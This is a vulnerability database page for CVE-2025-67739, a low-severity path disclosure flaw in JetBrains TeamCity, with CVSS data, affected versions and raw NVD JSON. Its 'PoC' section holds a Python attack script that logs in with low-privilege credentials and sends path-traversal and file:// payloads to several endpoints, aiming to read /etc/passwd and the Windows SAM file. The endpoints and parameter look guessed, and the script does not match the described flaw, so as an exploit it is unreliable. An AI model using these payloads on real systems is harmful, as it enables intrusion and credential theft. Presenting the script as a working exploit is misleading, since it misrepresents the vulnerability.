Security Vulnerability Report
中文
CVE-2025-67739 CVSS 3.1 LOW

CVE-2025-67739

Published: 2025-12-11 16:16:35
Last Modified: 2025-12-23 21:10:43
Source: [email protected]

Description

In JetBrains TeamCity before 2025.11.2 improper repository URL validation could lead to local paths disclosure

CVSS Details

CVSS Score
3.1
Severity
LOW
CVSS Vector
CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:L/I:N/A:N

Configurations (Affected Products)

cpe:2.3:a:jetbrains:teamcity:*:*:*:*:*:*:*:* - VULNERABLE
JetBrains TeamCity < 2025.11.2

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# CVE-2025-67739 PoC - JetBrains TeamCity Path Disclosure # Affected: JetBrains TeamCity < 2025.11.2 # Type: Information Disclosure via Improper URL Validation import requests import urllib3 urllib3.disable_warnings() target = "https://teamcity-server:8111" username = "low_priv_user" password = "password123" # Login to get session session = requests.Session() login_url = f"{target}/login.html" login_data = { "username": username, "password": password, "submitLogin": "Login" } response = session.post(login_url, data=login_data, verify=False) print(f"Login Status: {response.status_code}") # Try path traversal in repository URL vulnerable_endpoints = [ "/repository.html", "/admin/repository.html", "/app/rest/vcs-root-instances", "/app/rest/vcs-roots" ] payloads = [ "file:///etc/passwd", "file:///../../etc/passwd", "http://localhost/../../../etc/passwd", "../../../etc/passwd", "..\..\..\windows\system32\config\sam" ] for endpoint in vulnerable_endpoints: for payload in payloads: try: test_url = f"{target}{endpoint}?url={payload}" response = session.get(test_url, timeout=10, verify=False) if "root:" in response.text or "Administrator" in response.text: print(f"[+] VULNERABLE! Endpoint: {endpoint}") print(f"[+] Payload: {payload}") print(f"[+] Response snippet: {response.text[:500]}") elif "path" in response.text.lower() or "c:\windows" in response.text.lower(): print(f"[*] Possible path disclosure at: {endpoint}") print(f"[*] Payload: {payload}") except Exception as e: print(f"[-] Error testing {endpoint}: {e}") print("\n[!] Note: This PoC is for educational purposes only.") print("[!] Always obtain proper authorization before testing.")

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-67739", "sourceIdentifier": "[email protected]", "published": "2025-12-11T16:16:35.240", "lastModified": "2025-12-23T21:10:42.797", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "In JetBrains TeamCity before 2025.11.2 improper repository URL validation could lead to local paths disclosure"}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:L/I:N/A:N", "baseScore": 3.1, "baseSeverity": "LOW", "attackVector": "NETWORK", "attackComplexity": "HIGH", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 1.6, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-939"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:jetbrains:teamcity:*:*:*:*:*:*:*:*", "versionEndExcluding": "2025.11.2", "matchCriteriaId": "A13DC3A2-2D6C-4D33-B98D-C80AE71ED7A1"}]}]}], "references": [{"url": "https://www.jetbrains.com/privacy-security/issues-fixed/", "source": "[email protected]", "tags": ["Issue Tracking", "Vendor Advisory"]}]}}
Disclaimer

This information is for security research and authorized penetration testing only. Unauthorized testing of other systems is illegal.